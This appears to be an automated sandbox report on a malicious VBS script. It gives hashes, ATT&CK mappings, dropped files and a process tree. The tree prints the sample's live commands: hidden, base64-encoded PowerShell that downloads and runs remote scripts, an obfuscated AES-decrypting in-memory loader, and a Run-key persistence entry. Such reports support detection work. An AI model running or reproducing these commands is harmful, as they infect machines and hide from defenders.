a63181dff0f68b98712247f51c8a6e7761f8a84261928c297b12f438272c1492

General

Target

a63181dff0f68b98712247f51c8a6e7761f8a84261928c297b12f438272c1492.vbs
Size

1.6MB
MD5

7e0b7c6c89827a608664bf468d850933
SHA1

adcfcf643b371e24d79353f4f88231170229949f
SHA256

a63181dff0f68b98712247f51c8a6e7761f8a84261928c297b12f438272c1492
SHA512

ddfbaaaf6e7f06f5cbaa35e3b188064e71a6b4542185ecf71e0a89ed6411d98059c0b37b8ad3288b4029d5ddf870a3ad9f342fb521331ee1f39a2dad741778bd
SSDEEP

24576:PLOiXTUVNhZXj4TARZ3zRdIwEtiQXNosn/eYwv2FpZHFLKOJFErpvGcZqF:bINzTLgrSK/fJ7HpeYcy

Score

8^/10

discovery execution persistence

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
2964	powershell.exe
2200	powershell.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Windows\CurrentVersion\Run\dwm = "C:\\Users\\Admin\\dwm.bat"	reg.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe

Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs

pid	Process
2200	powershell.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
2964	powershell.exe
2200	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	2964	powershell.exe
Token: SeDebugPrivilege	2200	powershell.exe

Suspicious use of WriteProcessMemory 16 IoCs

description	pid	Process	procid_target
PID 2844 wrote to memory of 3016	2844	WScript.exe	30
PID 2844 wrote to memory of 3016	2844	WScript.exe	30
PID 2844 wrote to memory of 3016	2844	WScript.exe	30
PID 3016 wrote to memory of 2900	3016	cmd.exe	32
PID 3016 wrote to memory of 2900	3016	cmd.exe	32
PID 3016 wrote to memory of 2900	3016	cmd.exe	32
PID 2900 wrote to memory of 2964	2900	cmd.exe	34
PID 2900 wrote to memory of 2964	2900	cmd.exe	34
PID 2900 wrote to memory of 2964	2900	cmd.exe	34
PID 2900 wrote to memory of 1648	2900	cmd.exe	35
PID 2900 wrote to memory of 1648	2900	cmd.exe	35
PID 2900 wrote to memory of 1648	2900	cmd.exe	35
PID 2900 wrote to memory of 2200	2900	cmd.exe	36
PID 2900 wrote to memory of 2200	2900	cmd.exe	36
PID 2900 wrote to memory of 2200	2900	cmd.exe	36
PID 2900 wrote to memory of 2200	2900	cmd.exe	36

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\a63181dff0f68b98712247f51c8a6e7761f8a84261928c297b12f438272c1492.vbs"
1⤵
- Suspicious use of WriteProcessMemory
PID:2844
- C:\Windows\System32\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\c.bat" "
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3016
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\c.bat"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2900
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -noprofile -windowStyle Hidden -ep bypass -command "Invoke-Expression ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('aWV4IChJbnZva2UtV2ViUmVxdWVzdCAtVXJpICJodHRwczovLzB4MC5zdC84WDVULnBzMSIp')))"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2964
  - - C:\Windows\system32\reg.exe
      reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "dwm" /t REG_SZ /d "C:\Users\Admin\dwm.bat" /f
      4⤵
      Adds Run key to start application
      PID:1648
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hiDDen -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4IChbVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKFtDb252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ2FXVjRJQ2hKYm5admEyVXRWMlZpVW1WeGRXVnpkQ0F0VlhKcElDSm9kSFJ3T2k4dk1UVTJMakkxTXk0eU5UQXVOakk2TlRBd01DOWtiM2R1Ykc5aFpDOUhaVzVsY21GMFpXUlRZM0pwY0hRdWNITXhJaWs9JykpKTtlbXB0eXNlcnZpY2VzIC1ldHc7U3RhcnQtU2xlZXAgLVNlY29uZHMgMTA7ZnVuY3Rpb24gaHliaHZnaHJ6bGVhbXd2cHZ6aW1xdWNsb2hiZHBpaGNtdmdqcm9vaSgkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ1loYXQ4aGtCbHVnVzJyelF1OG1WVGhQRk5jUzJHZTRYNzNvWXNMeUU1L1E9Jyk7CSRhZXNfdmFyLklWPVtTeXN0ZW0uQ29udmVydF06OignZ25pcnRTNDZlc2FCbW9yRidbLTEuLi0xNl0gLWpvaW4gJycpKCdIZ01TMzMvSlFUdHVkNjROTXFMaVJ3PT0nKTsJJGRlY3J5cHRvcl92YXI9JGFlc192YXIuQ3JlYXRlRGVjcnlwdG9yKCk7CSRyZXR1cm5fdmFyPSRkZWNyeXB0b3JfdmFyLlRyYW5zZm9ybUZpbmFsQmxvY2soJHBhcmFtX3ZhciwgMCwgJHBhcmFtX3Zhci5MZW5ndGgpOwkkZGVjcnlwdG9yX3Zhci5EaXNwb3NlKCk7CSRhZXNfdmFyLkRpc3Bvc2UoKTsJJHJldHVybl92YXI7fWZ1bmN0aW9uIGR3d252YmFid3p1dmtpc252cHRuZWVicmRjbnJwbHhobGFqdXhvcW0oJHBhcmFtX3Zhcil7CUlFWCAnJGdhZ3FubXJlZHRuY3VhZHp2ZWpzb2psa2I9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFBQUJCQkNDQ2VtQUFBQkJCQ0NDb3JBQUFCQkJDQ0N5U0FBQUJCQkNDQ3RyQUFBQkJCQ0NDZWFBQUFCQkJDQ0NtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FBQUJCQkNDQycsICcnKTsJSUVYICckbWtqenhwaHpnaGV4a2Rya2lvdnh2bWt4aj1OZXctT2JqZWN0IFN5c3RlbS5JTy5BQUFCQkJDQ0NNQUFBQkJCQ0NDZUFBQUJCQkNDQ21BQUFCQkJDQ0NvQUFBQkJCQ0NDckFBQUJCQkNDQ3lBQUFCQkJDQ0NTQUFBQkJCQ0NDdEFBQUJCQkNDQ3JBQUFCQkJDQ0NlQUFBQkJCQ0NDYUFBQUJCQkNDQ21BQUFCQkJDQ0M7Jy5SZXBsYWNlKCdBQUFCQkJDQ0MnLCAnJyk7CUlFWCAnJHpzZXh5d292cGFjaGZmZWdjb3R5Ymtic2g9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQ0FBQUJCQkNDQ29tQUFBQkJCQ0NDcHJBQUFCQkJDQ0NlQUFBQkJCQ0NDc3NBQUFCQkJDQ0Npb0FBQUJCQkNDQ24uQUFBQkJCQ0NDR1pBQUFCQkJDQ0NpcEFBQUJCQkNDQ1N0QUFBQkJCQ0NDcmVBQUFCQkJDQ0NhbUFBQUJCQkNDQygkZ2FncW5tcmVkdG5jdWFkenZlanNvamxrYiwgW0lPLkNBQUFCQkJDQ0NvbUFBQUJCQkNDQ3ByQUFBQkJCQ0NDZXNBQUFCQkJDQ0NzaUFBQUJCQkNDQ29uQUFBQkJCQ0NDLkNvQUFBQkJCQ0NDbXBBQUFCQkJDQ0NyZUFBQUJCQkNDQ3NzQUFBQkJCQ0NDaUFBQUJCQkNDQ29BQUFCQkJDQ0NuQUFBQkJCQ0NDTW9kZV06OkRBQUFCQkJDQ0NlQUFBQkJCQ0NDY0FBQUJCQkNDQ29tcEFBQUJCQkNDQ3JlQUFBQkJCQ0NDc3MpOycuUmVwbGFjZSgnQUFBQkJCQ0NDJywgJycpOwkkenNleHl3b3ZwYWNoZmZlZ2NvdHlia2JzaC5Db3B5VG8oJG1ranp4cGh6Z2hleGtkcmtpb3Z4dm1reGopOwkkenNleHl3b3ZwYWNoZmZlZ2NvdHlia2JzaC5EaXNwb3NlKCk7CSRnYWdxbm1yZWR0bmN1YWR6dmVqc29qbGtiLkRpc3Bvc2UoKTsJJG1ranp4cGh6Z2hleGtkcmtpb3Z4dm1reGouRGlzcG9zZSgpOwkkbWtqenhwaHpnaGV4a2Rya2lvdnh2bWt4ai5Ub0FycmF5KCk7fWZ1bmN0aW9uIGVxYmxxdnp1ZXljdmhlb2l0dmtva253eWFibnhyb3F1dHVqKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewkJSUVYICckZnZxbmdhem1weXdjYmlrcGJ2ZHBkZGlycXN5cXlpb3JtcXRieWlpYT1bU3lzdGVtLlJBQUFCQkJDQ0NlQUFBQkJCQ0NDZmxBQUFCQkJDQ0NlY3RBQUFCQkJDQ0Npb0FBQUJCQkNDQ24uQUFBQkJCQ0NDQXNBQUFCQkJDQ0NzZUFBQUJCQkNDQ21iQUFBQkJCQ0NDbEFBQUJCQkNDQ3lBQUFCQkJDQ0NdOjpMQUFBQkJCQ0NDb0FBQUJCQkNDQ2FBQUFCQkJDQ0NkQUFBQkJCQ0NDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQUFCQkJDQ0MnLCAnJyk7CUlFWCAnJGN2cWhoZWJmamphcHhkZWJuenduYmpuaGplcGxwanF0bWNuaG5iam1yc2hvaHp0amxyPSRmdnFuZ2F6bXB5d2NiaWtwYnZkcGRkaXJxc3lxeWlvcm1xdGJ5aWlhLkFBQUJCQkNDQ0VBQUFCQkJDQ0NuQUFBQkJCQ0NDdEFBQUJCQkNDQ3JBQUFCQkJDQ0N5QUFBQkJCQ0NDUEFBQUJCQkNDQ29BQUFCQkJDQ0NpQUFBQkJCQ0NDbkFBQUJCQkNDQ3RBQUFCQkJDQ0M7Jy5SZXBsYWNlKCdBQUFCQkJDQ0MnLCAnJyk7CUlFWCAnJGN2cWhoZWJmamphcHhkZWJuenduYmpuaGplcGxwanF0bWNuaG5iam1yc2hvaHp0amxyLkFBQUJCQkNDQ0lBQUFCQkJDQ0NuQUFBQkJCQ0NDdkFBQUJCQkNDQ29BQUFCQkJDQ0NrQUFBQkJCQ0NDZUFBQUJCQkNDQygkbnVsbCwgJHBhcmFtMl92YXIpOycuUmVwbGFjZSgnQUFBQkJCQ0NDJywgJycpO30kaWFwZGh2aG5mbXV5b3pncXV4b2dyaWtnaCA9ICRlbnY6VVNFUk5BTUU7JGh3bWdyZmZueXZ2aGtlbnJld2RlemNjZmkgPSAnQzpcVXNlcnNcJyArICRpYXBkaHZobmZtdXlvemdxdXhvZ3Jpa2doICsgJ0FBQUJCQkNDQ1xBQUFCQkJDQ0NkQUFBQkJCQ0NDd0FBQUJCQkNDQ21BQUFCQkJDQ0MuQUFBQkJCQ0NDYkFBQUJCQkNDQ2FBQUFCQkJDQ0N0QUFBQkJCQ0NDJy5SZXBsYWNlKCdBQUFCQkJDQ0MnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkaHdtZ3JmZm55dnZoa2VucmV3ZGV6Y2NmaTskZGNncHo9W1N5c3RlbS5JTy5GaWxlXTo6KCd0eGVUbGxBZGFlUidbLTEuLi0xMV0gLWpvaW4gJycpKCRod21ncmZmbnl2dmhrZW5yZXdkZXpjY2ZpKS5TcGxpdChbRW52aXJvbm1lbnRdOjpOZXdMaW5lKTtmb3JlYWNoICgkZHp4IGluICRkY2dweikgewlpZiAoJGR6eC5TdGFydHNXaXRoKCc6OicpKQl7CQkkZXRoeG49JGR6eC5TdWJzdHJpbmcoMik7CQlicmVhazsJfX0kbWx6bWF4d2FydHdncnJoZmV5aG9xbmVpbHRwamJ6aG9heHE9W3N0cmluZ1tdXSRldGh4bi5TcGxpdCgnXCcpO0lFWCAnJG5zd2V1bmhpd21wbGtzam1rb216emhxYWdobXpybGlndGF1PWR3d252YmFid3p1dmtpc252cHRuZWVicmRjbnJwbHhobGFqdXhvcW0gKGh5Ymh2Z2hyemxlYW13dnB2emltcXVjbG9oYmRwaWhjbXZnanJvb2kgKFtBQUFCQkJDQ0NDQUFBQkJCQ0NDb0FBQUJCQkNDQ25BQUFCQkJDQ0N2QUFBQkJCQ0NDZUFBQUJCQkNDQ3J0XTo6QUFBQkJCQ0NDRkFBQUJCQkNDQ3JBQUFCQkJDQ0NvQUFBQkJCQ0NDbUFBQUJCQkNDQ0JBQUFCQkJDQ0NhQUFBQkJCQ0NDc2U2QUFBQkJCQ0NDNEFBQUJCQkNDQ1NBQUFCQkJDQ0N0QUFBQkJCQ0NDcmlBQUFCQkJDQ0NuQUFBQkJCQ0NDZ0FBQUJCQkNDQygkbWx6bWF4d2FydHdncnJoZmV5aG9xbmVpbHRwamJ6aG9heHFbMF0pKSk7Jy5SZXBsYWNlKCdBQUFCQkJDQ0MnLCAnJyk7SUVYICckbWl1bWFqZWl2d2llcnJueGFueHFmY3Z5bmFocWtkaXJqeHg9ZHd3bnZiYWJ3enV2a2lzbnZwdG5lZWJyZGNucnBseGhsYWp1eG9xbSAoaHliaHZnaHJ6bGVhbXd2cHZ6aW1xdWNsb2hiZHBpaGNtdmdqcm9vaSAoW0FBQUJCQkNDQ0NBQUFCQkJDQ0NvQUFBQkJCQ0NDbkFBQUJCQkNDQ3ZBQUFCQkJDQ0NlQUFBQkJCQ0NDckFBQUJCQkNDQ3RdOjpBQUFCQkJDQ0NGQUFBQkJCQ0NDckFBQUJCQkNDQ29BQUFCQkJDQ0NtQUFBQkJCQ0NDQkFBQUJCQkNDQ2FBQUFCQkJDQ0NzQUFBQkJCQ0NDZUFBQUJCQkNDQzZBQUFCQkJDQ0M0QUFBQkJCQ0NDU0FBQUJCQkNDQ3RyQUFBQkJCQ0NDaUFBQUJCQkNDQ25BQUFCQkJDQ0NnKCRtbHptYXh3YXJ0d2dycmhmZXlob3FuZWlsdHBqYnpob2F4cVsxXSkpKTsnLlJlcGxhY2UoJ0FBQUJCQkNDQycsICcnKTtlcWJscXZ6dWV5Y3ZoZW9pdHZrb2tud3lhYm54cm9xdXR1aiAkbnN3ZXVuaGl3bXBsa3NqbWtvbXp6aHFhZ2htenJsaWd0YXUgJG51bGw7ZXFibHF2enVleWN2aGVvaXR2a29rbnd5YWJueHJvcXV0dWogJG1pdW1hamVpdndpZXJybnhhbnhxZmN2eW5haHFrZGlyanh4ICgsW3N0cmluZ1tdXSAoJyVBQUFCQkJDQ0MnKSk7')) | Invoke-Expression"
      4⤵
      Command and Scripting Interpreter: PowerShell
      System Location Discovery: System Language Discovery
      Suspicious behavior: CmdExeWriteProcessMemorySpam
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2200

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Boot or Logon Autostart Execution

1

T1547

Registry Run Keys / Startup Folder

1

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

1

T1547

Registry Run Keys / Startup Folder

1

T1547.001

Defense Evasion

Modify Registry

1

T1112

Credential Access

Discovery

System Information Discovery

1

T1082

System Location Discovery

1

T1614

System Language Discovery

1

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\c.bat

Filesize
1.6MB

MD5
0f2d6e24c10a0c02a498acb09b8b25d0

SHA1
284ce989d3ba1af43591fa85147d591a11dd3720

SHA256
d2ca5cb28153f404d84cad9dd6b28725015527625a262d3b6471e0458f5ecb85

SHA512
449f0a9754804e6df9794ea58aa67b08bf72b8433619bb0c900e75d4b8e427a17680ffe01709c2ebe8e558db58c9edd0785ce43863a80b7148191f70f17c1d5f

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\UO63Y8ZR0BQ0NGL9GY07.temp

Filesize
7KB

MD5
2b6c11d6c5568444efbd2ace6b13d931

SHA1
cdb36ab709884b8477ae826e3a881888637322be

SHA256
4a8eedda190e9098f21b91faa876bdaff8b70d959e4b948f5775e89f3d432900

SHA512
c3c67bad3d1e146d9e49b4607ad5400a7d92a3339f7c0b2412cc38315c4130f08f12690dc18733a80a765d7c81545bf354e81919e67f9ad9c818205c97441665

Download Submit
memory/2964-13-0x000007FEF536E000-0x000007FEF536F000-memory.dmp

Filesize
4KB

Download
memory/2964-14-0x000000001B550000-0x000000001B832000-memory.dmp

Filesize
2.9MB

Download
memory/2964-15-0x0000000002320000-0x0000000002328000-memory.dmp

Filesize
32KB

Download
memory/2964-16-0x000007FEF50B0000-0x000007FEF5A4D000-memory.dmp

Filesize
9.6MB

Download
memory/2964-19-0x000007FEF50B0000-0x000007FEF5A4D000-memory.dmp

Filesize
9.6MB

Download
memory/2964-18-0x000007FEF50B0000-0x000007FEF5A4D000-memory.dmp

Filesize
9.6MB

Download
memory/2964-17-0x000007FEF50B0000-0x000007FEF5A4D000-memory.dmp

Filesize
9.6MB

Download
memory/2964-20-0x000007FEF50B0000-0x000007FEF5A4D000-memory.dmp

Filesize
9.6MB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads